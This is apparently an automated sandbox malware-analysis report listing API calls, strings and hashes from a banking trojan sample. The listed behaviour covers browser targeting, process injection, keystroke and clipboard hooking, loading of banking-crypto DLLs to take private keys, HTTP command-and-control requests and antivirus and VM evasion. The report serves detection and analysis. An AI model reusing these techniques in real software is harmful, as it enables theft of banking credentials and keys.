                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\opera.exe), ref: 02CA710F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02CA7125
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02CA713B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\avant.exe), ref: 02CA7151
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02CA7167
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\safari.exe), ref: 02CA717D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02CA7193
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02CA71A9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\frd.exe), ref: 02CA71BF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02CA71D5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02CA71EB
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAB8F0,00000000,00000000,00000000), ref: 02CA7219
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7233
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7240
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAEF80,00000000,00000000,00000000), ref: 02CA7255
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7269
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7276
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0560,00000000,00000000,00000000), ref: 02CA728B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA729F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA72AC
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB0E20,00000000,00000000,00000000), ref: 02CA72C1
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA72D5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA72E2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAF6A0,00000000,00000000,00000000), ref: 02CA72F7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA730B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7318
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CACB80,00000000,00000000,00000000), ref: 02CA732D
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7341
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA734E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CACC20,00000000,00000000,00000000), ref: 02CA7363
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7377
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7384
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB1590,00000000,00000000,00000000), ref: 02CA7399
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA73AD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA73BA
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB24D0,00000000,00000000,00000000), ref: 02CA73CF
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA73E3
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA73F0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB31C0,00000000,00000000,00000000), ref: 02CA7405
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7419
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7426
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB32B0,00000000,00000000,00000000), ref: 02CA743B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA744F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA745C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAFE80,00000000,00000000,00000000), ref: 02CA7471
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7485
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7492
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB3480,00000000,00000000,00000000), ref: 02CA74A7
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA74BB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA74C8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB43F0,00000000,00000000,00000000), ref: 02CA74DD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA74F1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA74FE
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB47D0,00000000,00000000,00000000), ref: 02CA7513
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7527
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7534
                                                                                                                                                                                                                • Part of subcall function 02CA5720: memset.MSVCRT ref: 02CA5741
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02CA5757
                                                                                                                                                                                                                • Part of subcall function 02CA5720: AddVectoredExceptionHandler.KERNEL32(00000001,02C93A20), ref: 02CA5764
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA577F
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02CA5799
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetHandleInformation.KERNEL32(00000000,?), ref: 02CA57B1
                                                                                                                                                                                                                • Part of subcall function 02CA5720: CloseHandle.KERNEL32(00000000), ref: 02CA57C2
                                                                                                                                                                                                                • Part of subcall function 02CA5720: InitializeCriticalSection.KERNEL32(02CDFB50), ref: 02CA57D3
                                                                                                                                                                                                                • Part of subcall function 02CA5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA57E9
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02CA57FB
                                                                                                                                                                                                                • Part of subcall function 02CA5720: LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA581A
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02CA5828
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02CA5844
                                                                                                                                                                                                                • Part of subcall function 02CA5720: GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02CA5860
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB19A0,00000000,00000000,00000000), ref: 02CA7549
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA755D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA756A
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB1C80,00000000,00000000,00000000), ref: 02CA757F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA7593
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA75A0
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C980C0,00000000,00000000,00000000), ref: 02CA75B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA75CD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA75E6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\isclient.exe), ref: 02CA75FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\ipc_full.exe), ref: 02CA7613
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\intpro.exe), ref: 02CA7625
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cbsmain.dll), ref: 02CA7637
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\clmain.exe), ref: 02CA7649
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\core.exe), ref: 02CA765B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\rundll32.exe), ref: 02CA766D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\notepad.exe), ref: 02CA767F
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02CA76EC
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA76FB
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA7714
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA771B
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA7731
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C9BC50,00000000,00000000,00000000), ref: 02CA7745
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA775D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA776E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00007FD0,00000000,00000000,00000000), ref: 02CA7783
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CA779B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA77AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Create$Thread$Information$Close$Security$Descriptor$AddressProc$HeapProcess$CriticalCurrentFreeInitializeModuleMutexPathSectionUser$AdminBackslashCommandConvertFileInfoLibraryLineLoadLocalNameNamedSaclStringVolume_snprintfmemset$DesktopDirectoryEnvironmentExceptionFolderHandlerMultipleObjectObjectsOpenQuerySleepSystemValidateValueVariableVectoredWaitWindowslstrcmpi
                                                                                                                                                                                                              • String ID: --no-sandbox$ --no-sandbox$5DD2BD1Da$5DD2BE51a$5dd2ba1da$C:\Users\user\AppData\Roaming\$IsWow64Process$RtlFreeHeap$S:(ML;;NRNWNX;;;LW)$\avant.exe$\cbsmain.dll$\chrome.exe$\clmain.exe$\core.exe$\explorer.exe$\firefox.exe$\frd.exe$\iexplore.exe$\intpro.exe$\ipc_full.exe$\isclient.exe$\java.exe$\javaw.exe$\javaws.exe$\maxthon.exe$\mnp.exe$\netscape.exe$\notepad.exe$\opera.exe$\rundll32.exe$\safari.exe$\svchost.exe$\tbb-firefox.exe$kernel32.dll$ntdll.dll

Control-flow Graph (function 02CA5720)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA5741
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,74DEF550,75B07390,74DF0A60), ref: 02CA5757
                                                                                                                                                                                                              • AddVectoredExceptionHandler.KERNEL32(00000001,02C93A20), ref: 02CA5764
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02CA577F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001A7B0,00000000,00000000,00000000), ref: 02CA5799
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA57B1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA57C2
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB50), ref: 02CA57D3
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA57E9
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02CA57FB
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA581A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02CA5828
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02CA5844
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02CA5860
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB38), ref: 02CA587B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02CA5882
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02CA5892
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,02C979E0,02CE9E88), ref: 02CA58A8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA58C3
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA58D8
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA58DF
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA58F1
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02CA590B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02CA591B
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,02C9BB50,02CDEB74), ref: 02CA5931
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA5940
                                                                                                                                                                                                              • GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02CA5955
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(00000000), ref: 02CA595C
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02CA596E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,java), ref: 02CA59A2
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.exe), ref: 02CA59B4
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,frd.exe), ref: 02CA59CA
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02CA59E1
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02CA59EF
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02CA5A0B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02CA5A27
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(02CDFB20), ref: 02CA5A42
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02CA5A6F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02CA5A7B
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02CA5A9A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02CA5AA6
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02CA5AC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02CA5AD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                              • String ID: .exe$5dd2ba1da$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1248150503-2694324294
                                                                                                                                                                                                              • Opcode ID: f5c947223c08e366acc08c17b10607a7ab689175f618067beeadaefda72ac36d
                                                                                                                                                                                                              • Instruction ID: ec59e646e53332d8bfb36d84b8d6b28dbfe4899a75ef65ba175ac34556f8edbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5c947223c08e366acc08c17b10607a7ab689175f618067beeadaefda72ac36d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C919371FC13167AFA2066B15C66F6A276C6F44FC8F944524B607F6080DBA4EA04DAB8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4AED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02CA4B27
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4B2E
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4B3E
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CA4B5D
                                                                                                                                                                                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02CA4BC2
                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02CA4BE1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02CA4C19
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02CA4C4A
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02CA4C5E
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA4C7C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02CA4C94
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02CA4CAA
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02CA4CCD
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02CA4D05
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02CA4D2C
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02CA4D4D
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02CA4D66
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4D70
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02CA4D83
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02CA4D86
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4D9E
                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02CA4DBB
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02CA4DDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4DEC
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4DFB
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E0B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E14
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E1B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E2C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E33
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E41
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E44
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02CA4E51
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02CA4E54
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02CA4E6A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02CA4E7B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • GET, xrefs: 02CA4BF5
                                                                                                                                                                                                              • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02CA4C6B
                                                                                                                                                                                                              • S:(ML;;NRNWNX;;;LW), xrefs: 02CA4D27
                                                                                                                                                                                                              • 61de29337166780, xrefs: 02CA4C66
                                                                                                                                                                                                              • HTTP/1.0, xrefs: 02CA4C11
                                                                                                                                                                                                              • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02CA4BBD
                                                                                                                                                                                                              • Content-Type: application/x-www-form-urlencoded, xrefs: 02CA4C42
                                                                                                                                                                                                              • POST, xrefs: 02CA4BFE, 02CA4C17
                                                                                                                                                                                                              • Referer: http://www.google.com, xrefs: 02CA4C58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                              • String ID: 61de29337166780$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1986934500-1153629099
                                                                                                                                                                                                              • Opcode ID: efe555c094c05036a289af937411a891a57968364d6a3d97c7f2f0aa353ceac2
                                                                                                                                                                                                              • Instruction ID: 00be33bdf92c910a0350cacc8c282c741eab2a21905d980f754226bc373ecd2b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efe555c094c05036a289af937411a891a57968364d6a3d97c7f2f0aa353ceac2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D1D171A41216ABEB249FA4CC59FDF7B6CEF48758F504614FA05E7180DBB0EA00CBA4

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$Pnv$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA6991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02CA69C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA69CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA69E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA69F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02CA6A06
